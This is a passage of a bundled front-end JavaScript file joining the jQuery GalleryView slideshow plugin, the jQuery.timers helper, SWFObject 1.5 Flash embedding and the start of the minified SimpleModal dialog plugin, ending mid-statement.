		var strip_width;
		var wrapper_width;
		var item_count = 0;
		var slide_method;
		var img_path;
		var paused = false;
		var frame_caption_size = 20;
		var frame_margin_top = 5;
		var pointer_width = 2;

		//Define jQuery objects for reuse
		var j_gallery;
		var j_filmstrip;
		var j_frames;
		var j_panels;
		var j_pointer;
		
/************************************************/
/*	Plugin Methods								*/
/************************************************/	
		function showItem(i) {
			//Disable next/prev buttons until transition is complete
			$('img.nav-next').unbind('click');
			$('img.nav-prev').unbind('click');
			j_frames.unbind('click');
			if(has_panels) {
				if(opts.fade_panels) {
					//Fade out all panels and fade in target panel
					j_panels.fadeOut(opts.transition_speed).eq(i%item_count).fadeIn(opts.transition_speed,function(){
						if(!has_filmstrip) {
							$('img.nav-prev').click(showPrevItem);
							$('img.nav-next').click(showNextItem);		
						}
					});
				} 
			}
			
			if(has_filmstrip) {
				//Slide either pointer or filmstrip, depending on transition method
				if(slide_method=='strip') {
					//Stop filmstrip if it's currently in motion
					j_filmstrip.stop();
					
					//Determine distance between pointer (eventual destination) and target frame
					var distance = getPos(j_frames[i]).left - (getPos(j_pointer[0]).left+2);
					var leftstr = (distance>=0?'-=':'+=')+Math.abs(distance)+'px';
					
					//Animate filmstrip and slide target frame under pointer
					//If target frame is a duplicate, jump back to 'original' frame
					j_filmstrip.animate({
						'left':leftstr
					},opts.transition_speed,opts.easing,function(){
						//Always ensure that there are a sufficient number of hidden frames on either
						//side of the filmstrip to avoid empty frames
						if(i>item_count) {
							i = i%item_count;
							iterator = i;
							j_filmstrip.css('left','-'+((opts.frame_width+frame_margin)*i)+'px');
						} else if (i<=(item_count-strip_size)) {
							i = (i%item_count)+item_count;
							iterator = i;
							j_filmstrip.css('left','-'+((opts.frame_width+frame_margin)*i)+'px');
						}
						
						if(!opts.fade_panels) {
							j_panels.hide().eq(i%item_count).show();
						}
						$('img.nav-prev').click(showPrevItem);
						$('img.nav-next').click(showNextItem);
						enableFrameClicking();
					});
				} else if(slide_method=='pointer') {
					//Stop pointer if it's currently in motion
					j_pointer.stop();
					//Get position of target frame
					var pos = getPos(j_frames[i]);
					//Slide the pointer over the target frame
					j_pointer.animate({
						'left':(pos.left-2+'px')
					},opts.transition_speed,opts.easing,function(){	
						if(!opts.fade_panels) {
							j_panels.hide().eq(i%item_count).show();
						}	
						$('img.nav-prev').click(showPrevItem);
						$('img.nav-next').click(showNextItem);
						enableFrameClicking();
					});
				}
			
				if($('a',j_frames[i])[0]) {
					j_pointer.unbind('click').click(function(){
						var a = $('a',j_frames[i]).eq(0);
						if(a.attr('target')=='_blank') {window.open(a.attr('href'));}
						else {location.href = a.attr('href');}
					});
				}
			}
		};
		function showNextItem() {
			$(document).stopTime("transition");
			if(++iterator==j_frames.length) {iterator=0;}
			showItem(iterator);
			$(document).everyTime(opts.transition_interval,"transition",function(){
				showNextItem();
			});
		};
		function showPrevItem() {
			$(document).stopTime("transition");
			if(--iterator<0) {iterator = item_count-1;}
			//alert(iterator);
			showItem(iterator);
			$(document).everyTime(opts.transition_interval,"transition",function(){
				showNextItem();
			});
		};
		function getPos(el) {
			var left = 0, top = 0;
			var el_id = el.id;
			if(el.offsetParent) {
				do {
					left += el.offsetLeft;
					top += el.offsetTop;
				} while(el = el.offsetParent);
			}
			//If we want the position of the gallery itself, return it
			if(el_id == id) {return {'left':left,'top':top};}
			//Otherwise, get position of element relative to gallery
			else {
				var gPos = getPos(j_gallery[0]);
				var gLeft = gPos.left;
				var gTop = gPos.top;
				
				return {'left':left-gLeft,'top':top-gTop};
			}
		};
		function enableFrameClicking() {
			j_frames.each(function(i){
				//If there isn't a link in this frame, set up frame to slide on click
				//Frames with links will handle themselves
				if($('a',this).length==0) {
					$(this).click(function(){
						$(document).stopTime("transition");
						showItem(i);
						iterator = i;
						$(document).everyTime(opts.transition_interval,"transition",function(){
							showNextItem();
						});
					});
				}
			});
		};
		
		function buildPanels() {
			//If there are panel captions, add overlay divs
			if($('.panel-overlay').length>0) {j_panels.append('<div class="overlay"></div>');}
			img_path = "/js/themes/";
			if(!has_filmstrip) {
				//Add navigation buttons
				$('<img />').addClass('nav-next').attr('src',img_path+opts.nav_theme+'/next.png').appendTo(j_gallery).css({
					'position':'absolute',
					'zIndex':'1100',
					'cursor':'pointer',
					'top':((opts.panel_height-22)/2)+'px',
					'right':'10px',
					'display':'none'
				}).click(showNextItem);
				$('<img />').addClass('nav-prev').attr('src',img_path+opts.nav_theme+'/prev.png').appendTo(j_gallery).css({
					'position':'absolute',
					'zIndex':'1100',
					'cursor':'pointer',
					'top':((opts.panel_height-22)/2)+'px',
					'left':'10px',
					'display':'none'
				}).click(showPrevItem);
				
				$('<img />').addClass('nav-overlay').attr('src',img_path+opts.nav_theme+'/panel-nav-next.png').appendTo(j_gallery).css({
					'position':'absolute',
					'zIndex':'1099',
					'top':((opts.panel_height-22)/2)-10+'px',
					'right':'0',
					'display':'none'
				});
				
				$('<img />').addClass('nav-overlay').attr('src',img_path+opts.nav_theme+'/panel-nav-prev.png').appendTo(j_gallery).css({
					'position':'absolute',
					'zIndex':'1099',
					'top':((opts.panel_height-22)/2)-10+'px',
					'left':'0',
					'display':'none'
				});
			}
			j_panels.css({
				'width':(opts.panel_width-parseInt(j_panels.css('paddingLeft').split('px')[0],10)-parseInt(j_panels.css('paddingRight').split('px')[0],10))+'px',
				'height':(opts.panel_height-parseInt(j_panels.css('paddingTop').split('px')[0],10)-parseInt(j_panels.css('paddingBottom').split('px')[0],10))+'px',
				'position':'absolute',
				'top':(opts.filmstrip_position=='top'?(opts.frame_height+frame_margin_top+(opts.show_captions?frame_caption_size:frame_margin_top))+'px':'0px'),
				'left':'0px',
				'overflow':'hidden',
				'background':'#151415',
				'display':'none'
			});
			$('.panel-overlay',j_panels).css({
				'position':'absolute',
				'zIndex':'999',
				'width':(opts.panel_width-20)+'px',
				'height':opts.overlay_height+'px',
				'top':(opts.overlay_position=='top'?'0':opts.panel_height-opts.overlay_height+'px'),
				'left':'0',
				'padding':'0 10px',
				'color':opts.overlay_text_color,
				'fontSize':opts.overlay_font_size
			});
			$('.panel-overlay a',j_panels).css({
				'color':opts.overlay_text_color,
				'textDecoration':'underline',
				'fontWeight':'bold'
			});
			$('.overlay',j_panels).css({
				'position':'absolute',
				'zIndex':'998',
				'width':opts.panel_width+'px',
				'height':opts.overlay_height+'px',
				'top':(opts.overlay_position=='top'?'0':opts.panel_height-opts.overlay_height+'px'),
				'left':'0',
				'background':opts.overlay_color,
				'opacity':opts.overlay_opacity
			});
			$('.panel iframe',j_panels).css({
				'width':opts.panel_width+'px',
				'height':(opts.panel_height-opts.overlay_height)+'px',
				'border':'0'
			});
		};
		
		function buildFilmstrip() {
			//Add wrapper to filmstrip to hide extra frames
			j_filmstrip.wrap('<div class="strip_wrapper"></div>');
			if(slide_method=='strip') {
				j_frames.clone().appendTo(j_filmstrip);
				j_frames.clone().appendTo(j_filmstrip);
				j_frames = $('li',j_filmstrip);
			}
			//If captions are enabled, add caption divs and fill with the image titles
			if(opts.show_captions) {
				j_frames.append('<div class="caption"></div>').each(function(i){
					$(this).find('.caption').html($(this).find('img').attr('title'));			   
				});
			}
			
			j_filmstrip.css({
				'listStyle':'none',
				'margin':'0',
				'padding':'0',
				'width':strip_width+'px',
				'position':'absolute',
				'zIndex':'900',
				'top':'0',
				'left':'0',
				'height':(opts.frame_height+10)+'px',
				'background':opts.background_color
			});
			j_frames.css({
				'float':'left',
				'position':'relative',
				'overflow':'hidden',
				'height':opts.frame_height+'px',
				'width':opts.frame_width+'px',				
				'zIndex':'901',
				'marginTop':frame_margin_top+'px',
				'marginBottom':'0px',
				'marginRight':frame_margin+'px',
				'padding':'0',
				'cursor':'pointer'
			});
			$('img',j_frames).css({
				'border':'none'
			});
			$('.strip_wrapper',j_gallery).css({
				'position':'absolute',
				'top':(opts.filmstrip_position=='top'?'0px':opts.panel_height+'px'),
				'left':((gallery_width-wrapper_width)/2)+'px',
				'width':wrapper_width+'px',
				'height':(opts.frame_height+frame_margin_top+(opts.show_captions?frame_caption_size:frame_margin_top))+'px',
				'overflow':'hidden'
			});
			$('.caption',j_gallery).css({
				'position':'absolute',
				'top':opts.frame_height+'px',
				'left':'0',
				'margin':'0',
				'width':opts.frame_width+'px',
				'padding':'0',
				'color':opts.caption_text_color,
				'textAlign':'center',
				'fontSize':'10px',
				'height':frame_caption_size+'px',
				
				'lineHeight':frame_caption_size+'px'
			});
			img_path = "/js/themes/";
			var pointer = $('<div></div>');
			pointer.attr('id','pointer').appendTo(j_gallery).css({
				 'position':'absolute',
				 'zIndex':'1000',
				 'cursor':'pointer',
				 'top':getPos(j_frames[0]).top-(pointer_width/2)+'px',
				 'left':getPos(j_frames[0]).left-(pointer_width/2)+'px',
				 'height':opts.frame_height-pointer_width+'px',
				 'width':opts.frame_width-pointer_width+'px',
				 'border':(has_panels?pointer_width+'px solid '+(opts.nav_theme=='dark'?'black':'#ec008c'):'none')
			});
			j_pointer = $('#pointer',j_gallery);
			if(has_panels) {
				var pointerArrow = $('<img />');
				pointerArrow.attr('src',img_path+opts.nav_theme+'/pointer'+(opts.filmstrip_position=='top'?'-down':'')+'.png').appendTo($('#pointer')).css({
					'position':'absolute',
					'zIndex':'1001',
					'top':(opts.filmstrip_position=='bottom'?'-'+(10+pointer_width)+'px':opts.frame_height+'px'),
					'left':((opts.frame_width/2)-10)+'px'
				});
			}
			
			//If the filmstrip is animating, move the strip to the middle third
			if(slide_method=='strip') {
				j_filmstrip.css('left','-'+((opts.frame_width+frame_margin)*item_count)+'px');
				iterator = item_count;
			}
			//If there's a link under the pointer, enable clicking on the pointer
			if($('a',j_frames[iterator])[0]) {
				j_pointer.click(function(){
					var a = $('a',j_frames[iterator]).eq(0);
					if(a.attr('target')=='_blank') {window.open(a.attr('href'));}
					else {location.href = a.attr('href');}
				});
			}
			
			//Add navigation buttons
			$('<img />').addClass('nav-next').attr('src',img_path+opts.nav_theme+'/next.png').appendTo(j_gallery).css({
				'position':'absolute',
				'cursor':'pointer',
				'top':(opts.filmstrip_position=='top'?0:opts.panel_height)+frame_margin_top+((opts.frame_height-22)/2)+'px',
				'right':(gallery_width/2)-(wrapper_width/2)-10-22+'px'
			}).click(showNextItem);
			$('<img />').addClass('nav-prev').attr('src',img_path+opts.nav_theme+'/prev.png').appendTo(j_gallery).css({
				'position':'absolute',
				'cursor':'pointer',
				'top':(opts.filmstrip_position=='top'?0:opts.panel_height)+frame_margin_top+((opts.frame_height-22)/2)+'px',
				'left':(gallery_width/2)-(wrapper_width/2)-10-22+'px'
			}).click(showPrevItem);
		};
		
		//Check mouse to see if it is within the borders of the panel
		//More reliable than 'mouseover' event when elements overlay the panel
		function mouseIsOverPanels(x,y) {		
			var pos = getPos(j_gallery[0]);
			var top = pos.top;
			var left = pos.left;
			return x > left && x < left+opts.panel_width && y > top && y < top+opts.panel_height;				
		};
		
/************************************************/
/*	Main Plugin Code							*/
/************************************************/
		return this.each(function() {
			j_gallery = $(this);
			//Determine path between current page and filmstrip images
			//Scan script tags and look for path to GalleryView plugin
			$('script').each(function(i){
				var s = $(this);
				if(s.attr('src') && s.attr('src').match(/jquery\.galleryview/)){
					img_path = s.attr('src').split('jquery.galleryview')[0]+'themes/';	
				}
			});
			
			//Hide gallery to prevent Flash of Unstyled Content (FoUC) in IE
			j_gallery.css('visibility','hidden');
			
			//Assign elements to variables for reuse
			j_filmstrip = $('.filmstrip',j_gallery);
			j_frames = $('li',j_filmstrip);
			j_panels = $('.panel',j_gallery);
			
			id = j_gallery.attr('id');
			
			has_panels = j_panels.length > 0;
			has_filmstrip = j_frames.length > 0;
			
			if(!has_panels) opts.panel_height = 0;
			
			//Number of frames in filmstrip
			item_count = has_panels?j_panels.length:j_frames.length;
			
			//Number of frames that can display within the screen's width
			//64 = width of block for navigation button * 2
			//5 = minimum frame margin
			strip_size = has_panels?Math.floor((opts.panel_width-64)/(opts.frame_width+frame_margin)):Math.min(item_count,opts.filmstrip_size); 
			
			
			/************************************************/
			/*	Determine transition method for filmstrip	*/
			/************************************************/
					//If more items than strip size, slide filmstrip
					//Otherwise, slide pointer
					if(strip_size >= item_count) {
						slide_method = 'pointer';
						strip_size = item_count;
					}
					else {slide_method = 'strip';}
			
			/************************************************/
			/*	Determine dimensions of various elements	*/
			/************************************************/
					
					//Width of gallery block
					gallery_width = has_panels?opts.panel_width:(strip_size*(opts.frame_width+frame_margin))-frame_margin+64;
					
					//Height of gallery block = screen + filmstrip + captions (optional)
					gallery_height = (has_panels?opts.panel_height:0)+(has_filmstrip?opts.frame_height+frame_margin_top+(opts.show_captions?frame_caption_size:frame_margin_top):0);
					
					//Width of filmstrip
					if(slide_method == 'pointer') {strip_width = (opts.frame_width*item_count)+(frame_margin*(item_count));}
					else {strip_width = (opts.frame_width*item_count*3)+(frame_margin*(item_count*3));}
					
					//Width of filmstrip wrapper (to hide overflow)
					wrapper_width = ((strip_size*opts.frame_width)+((strip_size-1)*frame_margin));
			
			/************************************************/
			/*	Apply CSS Styles							*/
			/************************************************/
					j_gallery.css({
						'position':'relative',
						'margin':'0',
						'background':opts.background_color,
						'border':opts.border,
						'width':gallery_width+'px',
						'height':gallery_height+'px'
					});
			
			/************************************************/
			/*	Build filmstrip and/or panels				*/
			/************************************************/
					if(has_filmstrip) {
						buildFilmstrip();
					}
					if(has_panels) {
						buildPanels();
					}

			
			/************************************************/
			/*	Add events to various elements				*/
			/************************************************/
					if(has_filmstrip) enableFrameClicking();
					
						
						
						$().mousemove(function(e){							
							if(mouseIsOverPanels(e.pageX,e.pageY)) {
								if(opts.pause_on_hover) {
									$(document).oneTime(500,"animation_pause",function(){
										$(document).stopTime("transition");
										paused=true;
									});
								}
								if(has_panels && !has_filmstrip) {
									$('.nav-overlay').fadeIn('fast');
									$('.nav-next').fadeIn('fast');
									$('.nav-prev').fadeIn('fast');
								}
							} else {
								if(opts.pause_on_hover) {
									$(document).stopTime("animation_pause");
									if(paused) {
										$(document).everyTime(opts.transition_interval,"transition",function(){
											showNextItem();
										});
										paused = false;
									}
								}
								if(has_panels && !has_filmstrip) {
									$('.nav-overlay').fadeOut('fast');
									$('.nav-next').fadeOut('fast');
									$('.nav-prev').fadeOut('fast');
								}
							}
						});
			
			
			/************************************************/
			/*	Initiate Automated Animation				*/
			/************************************************/
					//Show the first panel

					j_panels.eq(opts.start).show();
					showItem(opts.start)

					//If we have more than one item, begin automated transitions
					if(item_count > 1) {
						$(document).everyTime(opts.transition_interval,"transition",function(){
							showNextItem();
						});
					}
					
					//Make gallery visible now that work is complete
					j_gallery.css('visibility','visible');
		});
	};
	
	$.fn.galleryView.defaults = {
		start: 0,
		panel_width: 620,
		panel_height: 500,
		frame_width: 80,
		frame_height: 60,
		filmstrip_size: 3,
		overlay_height: 40,
		overlay_font_size: '1em',
		transition_speed: 400,
		transition_interval: 6000,
		overlay_opacity: 0.6,
		overlay_color: 'black',
		background_color: '#999',
		overlay_text_color: 'white',
		caption_text_color: 'white',
		border: '0px solid black',
		nav_theme: 'light',
		easing: 'swing',
		filmstrip_position: 'bottom',
		overlay_position: 'bottom',
		show_captions: false,
		fade_panels: true,
		pause_on_hover: false
	};
})(jQuery);
/**
 * jQuery.timers - Timer abstractions for jQuery
 * Written by Blair Mitchelmore (blair DOT mitchelmore AT gmail DOT com)
 * Licensed under the WTFPL (http://sam.zoy.org/wtfpl/).
 * Date: 2009/02/08
 *
 * @author Blair Mitchelmore
 * @version 1.1.2
 *
 **/

jQuery.fn.extend({
	everyTime: function(interval, label, fn, times, belay) {
		return this.each(function() {
			jQuery.timer.add(this, interval, label, fn, times, belay);
		});
	},
	oneTime: function(interval, label, fn) {
		return this.each(function() {
			jQuery.timer.add(this, interval, label, fn, 1);
		});
	},
	stopTime: function(label, fn) {
		return this.each(function() {
			jQuery.timer.remove(this, label, fn);
		});
	}
});

jQuery.event.special

jQuery.extend({
	timer: {
		global: [],
		guid: 1,
		dataKey: "jQuery.timer",
		regex: /^([0-9]+(?:\.[0-9]*)?)\s*(.*s)?$/,
		powers: {
			// Yeah this is major overkill...
			'ms': 1,
			'cs': 10,
			'ds': 100,
			's': 1000,
			'das': 10000,
			'hs': 100000,
			'ks': 1000000
		},
		timeParse: function(value) {
			if (value == undefined || value == null)
				return null;
			var result = this.regex.exec(jQuery.trim(value.toString()));
			if (result[2]) {
				var num = parseFloat(result[1]);
				var mult = this.powers[result[2]] || 1;
				return num * mult;
			} else {
				return value;
			}
		},
		add: function(element, interval, label, fn, times, belay) {
			var counter = 0;
			
			if (jQuery.isFunction(label)) {
				if (!times) 
					times = fn;
				fn = label;
				label = interval;
			}
			
			interval = jQuery.timer.timeParse(interval);

			if (typeof interval != 'number' || isNaN(interval) || interval <= 0)
				return;

			if (times && times.constructor != Number) {
				belay = !!times;
				times = 0;
			}
			
			times = times || 0;
			belay = belay || false;
			
			var timers = jQuery.data(element, this.dataKey) || jQuery.data(element, this.dataKey, {});
			
			if (!timers[label])
				timers[label] = {};
			
			fn.timerID = fn.timerID || this.guid++;
			
			var handler = function() {
				if (belay && this.inProgress) 
					return;
				this.inProgress = true;
				if ((++counter > times && times !== 0) || fn.call(element, counter) === false)
					jQuery.timer.remove(element, label, fn);
				this.inProgress = false;
			};
			
			handler.timerID = fn.timerID;
			
			if (!timers[label][fn.timerID])
				timers[label][fn.timerID] = window.setInterval(handler,interval);
			
			this.global.push( element );
			
		},
		remove: function(element, label, fn) {
			var timers = jQuery.data(element, this.dataKey), ret;
			
			if ( timers ) {
				
				if (!label) {
					for ( label in timers )
						this.remove(element, label, fn);
				} else if ( timers[label] ) {
					if ( fn ) {
						if ( fn.timerID ) {
							window.clearInterval(timers[label][fn.timerID]);
							delete timers[label][fn.timerID];
						}
					} else {
						for ( var fn in timers[label] ) {
							window.clearInterval(timers[label][fn]);
							delete timers[label][fn];
						}
					}
					
					for ( ret in timers[label] ) break;
					if ( !ret ) {
						ret = null;
						delete timers[label];
					}
				}
				
				for ( ret in timers ) break;
				if ( !ret ) 
					jQuery.removeData(element, this.dataKey);
			}
		}
	}
});

jQuery(window).bind("unload", function() {
	jQuery.each(jQuery.timer.global, function(index, item) {
		jQuery.timer.remove(item);
	});
});
/**
 * SWFObject v1.5: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
 *
 * SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
 * http://www.opensource.org/licenses/mit-license.php
 *
 */
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1){this.setAttribute("swf",_1);}if(id){this.setAttribute("id",id);}if(w){this.setAttribute("width",w);}if(h){this.setAttribute("height",h);}if(_5){this.setAttribute("version",new deconcept.PlayerVersion(_5.toString().split(".")));}this.installedVer=deconcept.SWFObjectUtil.getPlayerVersion();if(!window.opera&&document.all&&this.installedVer.major>7){deconcept.SWFObject.doPrepUnload=true;}if(c){this.addParam("bgcolor",c);}var q=_7?_7:"high";this.addParam("quality",q);this.setAttribute("useExpressInstall",false);this.setAttribute("doExpressInstall",false);var _c=(_8)?_8:window.location;this.setAttribute("xiRedirectUrl",_c);this.setAttribute("redirectUrl","");if(_9){this.setAttribute("redirectUrl",_9);}};deconcept.SWFObject.prototype={useExpressInstall:function(_d){this.xiSWFPath=!_d?"expressinstall.swf":_d;this.setAttribute("useExpressInstall",true);},setAttribute:function(_e,_f){this.attributes[_e]=_f;},getAttribute:function(_10){return this.attributes[_10];},addParam:function(_11,_12){this.params[_11]=_12;},getParams:function(){return this.params;},addVariable:function(_13,_14){this.variables[_13]=_14;},getVariable:function(_15){return this.variables[_15];},getVariables:function(){return this.variables;},getVariablePairs:function(){var _16=new Array();var key;var _18=this.getVariables();for(key in _18){_16[_16.length]=key+"="+_18[key];}return _16;},getSWFHTML:function(){var _19="";if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");this.setAttribute("swf",this.xiSWFPath);}_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\"";_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";var _1a=this.getParams();for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}var _1c=this.getVariablePairs().join("&");if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");this.setAttribute("swf",this.xiSWFPath);}_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\">";_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";var _1d=this.getParams();for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}var _1f=this.getVariablePairs().join("&");if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}return _19;},write:function(_20){if(this.getAttribute("useExpressInstall")){var _21=new deconcept.PlayerVersion([6,0,65]);if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){this.setAttribute("doExpressInstall",true);this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));document.title=document.title.slice(0,47)+" - Flash Player Installation";this.addVariable("MMdoctitle",document.title);}}if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){var n=(typeof _20=="string")?document.getElementById(_20):_20;n.innerHTML=this.getSWFHTML();return true;}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}return false;}};deconcept.SWFObjectUtil.getPlayerVersion=function(){var _23=new deconcept.PlayerVersion([0,0,0]);if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"];if(x&&x.description){_23=new deconcept.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}}else{if(navigator.userAgent&&navigator.userAgent.indexOf("Windows CE")>=0){var axo=1;var _26=3;while(axo){try{_26++;axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+_26);_23=new deconcept.PlayerVersion([_26,0,0]);}catch(e){axo=null;}}}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");_23=new deconcept.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}catch(e){}}if(axo!=null){_23=new deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}}return _23;};deconcept.PlayerVersion=function(_29){this.major=_29[0]!=null?parseInt(_29[0]):0;this.minor=_29[1]!=null?parseInt(_29[1]):0;this.rev=_29[2]!=null?parseInt(_29[2]):0;};deconcept.PlayerVersion.prototype.versionIsValid=function(fv){if(this.major<fv.major){return false;}if(this.major>fv.major){return true;}if(this.minor<fv.minor){return false;}if(this.minor>fv.minor){return true;}if(this.rev<fv.rev){return false;}return true;};deconcept.util={getRequestParameter:function(_2b){var q=document.location.search||document.location.hash;if(_2b==null){return q;}if(q){var _2d=q.substring(1).split("&");for(var i=0;i<_2d.length;i++){if(_2d[i].substring(0,_2d[i].indexOf("="))==_2b){return _2d[i].substring((_2d[i].indexOf("=")+1));}}}return "";}};deconcept.SWFObjectUtil.cleanupSWFs=function(){var _2f=document.getElementsByTagName("OBJECT");for(var i=_2f.length-1;i>=0;i--){_2f[i].style.display="none";for(var x in _2f[i]){if(typeof _2f[i][x]=="function"){_2f[i][x]=function(){};}}}};if(deconcept.SWFObject.doPrepUnload){if(!deconcept.unloadSet){deconcept.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",deconcept.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",deconcept.SWFObjectUtil.prepUnload);deconcept.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

/*
 * SimpleModal 1.4.1 - jQuery Plugin
 * http://www.ericmmartin.com/projects/simplemodal/
 * Copyright (c) 2010 Eric Martin (http://twitter.com/ericmmartin)
 * Dual licensed under the MIT and GPL licenses
 * Revision: $Id: jquery.simplemodal.js 261 2010-11-05 21:16:20Z emartin24 $
 */
(function(d){var k=d.browser.msie&&parseInt(d.browser.version)===6&&typeof window.XMLHttpRequest!=="object",m=d.browser.msie&&parseInt(d.browser.version)===7,l=null,f=[];d.modal=function(a,b){return d.modal.impl.init(a,b)};d.modal.close=function(){d.modal.impl.close()};d.modal.focus=function(a){d.modal.impl.focus(a)};d.modal.setContainerDimensions=function(){d.modal.impl.setContainerDimensions()};d.modal.setPosition=function(){d.modal.impl.setPosition()};d.modal.update=function(a,b){d.modal.impl.update(a,
b)};d.fn.modal=function(a){return d.modal.impl.init(this,a)};d.modal.defaults={appendTo:"body",focus:true,opacity:50,overlayId:"simplemodal-overlay",overlayCss:{},containerId:"simplemodal-container",containerCss:{},dataId:"simplemodal-data",dataCss:{},minHeight:null,minWidth:null,maxHeight:null,maxWidth:null,autoResize:false,autoPosition:true,zIndex:1E3,close:true,closeHTML:'<a class="modalCloseImg" title="Close"></a>',closeClass:"simplemodal-close",escClose:true,overlayClose:false,position:null,
persist:false,modal:true,onOpen:null,onShow:null,onClose:null};d.modal.impl={d:{},init:function(a,b){var c=this;if(c.d.data)return false;l=d.browser.msie&&!d.boxModel;c.o=d.extend({},d.modal.defaults,b);c.zIndex=c.o.zIndex;c.occb=false;if(typeof a==="object"){a=a instanceof jQuery?a:d(a);c.d.placeholder=false;if(a.parent().parent().size()>0){a.before(d("<span></span>").attr("id","simplemodal-placeholder").css({display:"none"}));c.d.placeholder=true;c.display=a.css("display");if(!c.o.persist)c.d.orig=
a.clone(true)}}else if(typeof a==="string"||typeof a==="number")a=d("<div></div>").html(a);else{alert("SimpleModal Error: Unsupported data type: "+typeof a);return c}c.create(a);c.open();d.isFunction(c.o.onShow)&&c.o.onShow.apply(c,[c.d]);return c},create:function(a){var b=this;f=b.getDimensions();if(b.o.modal&&k)b.d.iframe=d('<iframe src="javascript:false;"></iframe>').css(d.extend(b.o.iframeCss,{display:"none",opacity:0,position:"fixed",height:f[0],width:f[1],zIndex:b.o.zIndex,top:0,left:0})).appendTo(b.o.appendTo);
b.d.overlay=d("<div></div>").attr("id",b.o.overlayId).addClass("simplemodal-overlay").css(d.extend(b.o.overlayCss,{display:"none",opacity:b.o.opacity/100,height:b.o.modal?f[0]:0,width:b.o.modal?f[1]:0,position:"fixed",left:0,top:0,zIndex:b.o.zIndex+1})).appendTo(b.o.appendTo);b.d.container=d("<div></div>").attr("id",b.o.containerId).addClass("simplemodal-container").css(d.extend(b.o.containerCss,{display:"none",position:"fixed",zIndex:b.o.zIndex+2})).append(b.o.close&&b.o.closeHTML?d(b.o.closeHTML).addClass(b.o.closeClass):
"").appendTo(b.o.appendTo);b.d.wrap=d("<div></div>").attr("tabIndex",-1).addClass("simplemodal-wrap").css({height:"100%",outline:0,width:"100%"}).appendTo(b.d.container);b.d.data=a.attr("id",a.attr("id")||b.o.dataId).addClass("simplemodal-data").css(d.extend(b.o.dataCss,{display:"none"})).appendTo("body");b.setContainerDimensions();b.d.data.appendTo(b.d.wrap);if(k||l)b.fixIE()},bindEvents:function(){var a=this;d("."+a.o.closeClass).bind("click.simplemodal",function(b){b.preventDefault();a.close()});
a.o.modal&&a.o.close&&a.o.overlayClose&&a.d.overlay.bind("click.simplemodal",function(b){b.preventDefault();a.close()});d(document).bind("keydown.simplemodal",function(b){if(a.o.modal&&b.keyCode===9)a.watchTab(b);else if(a.o.close&&a.o.escClose&&b.keyCode===27){b.preventDefault();a.close()}});d(window).bind("resize.simplemodal",function(){f=a.getDimensions();a.o.autoResize?a.setContainerDimensions():a.o.autoPosition&&a.setPosition();if(k||l)a.fixIE();else if(a.o.modal){a.d.iframe&&a.d.iframe.css({height:f[0],
width:f[1]});a.d.overlay.css({height:f[0],width:f[1]})}})},unbindEvents:function(){d("."+this.o.closeClass).unbind("click.simplemodal");d(document).unbind("keydown.simplemodal");d(window).unbind("resize.simplemodal");this.d.overlay.unbind("click.simplemodal")},fixIE:function(){var a=this,b=a.o.position;d.each([a.d.iframe||null,!a.o.modal?null:a.d.overlay,a.d.container],function(c,h){if(h){var g=h[0].style;g.position="absolute";if(c<2){g.removeExpression("height");g.removeExpression("width");g.setExpression("height",
